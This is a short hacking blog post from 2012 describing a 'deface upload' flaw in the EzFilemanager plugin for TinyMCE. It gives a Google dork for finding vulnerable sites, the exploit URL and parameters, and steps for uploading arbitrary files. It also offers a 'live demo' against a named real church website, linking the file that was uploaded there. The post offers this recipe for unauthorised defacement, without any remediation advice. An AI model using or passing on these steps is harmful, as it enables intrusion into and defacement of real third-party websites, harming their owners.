Editor Picks

Welcome to ABHIJEET VISHEN's Blogger Register YourSelf For Ethical Hacking Classes To Be an Expert & Win Prizes"    Register Your Self to Learn Ethical Hacking,Hardware & Networking,HTML,DOT NET,PHP

Monday 18 June 2012

EzFilemanager Deface Upload Vulnerability

6/18/2012 08:43:00 am ABHIJEET VISHEN No comments

EzFilemanager Deface Upload Vulnerability


 
Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)
Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and
put ?sa=1&type=file after URL
now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
Live Demo : http://www.monumentbiblechurch.com/administration/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Result : http://www.monumentbiblechurch.com/mbcphotos/files/aaaaaaaa.txt
Posted in:

0 comments:

Post a Comment

RSS FeedRSS Subscription!
Follow me!Follow me!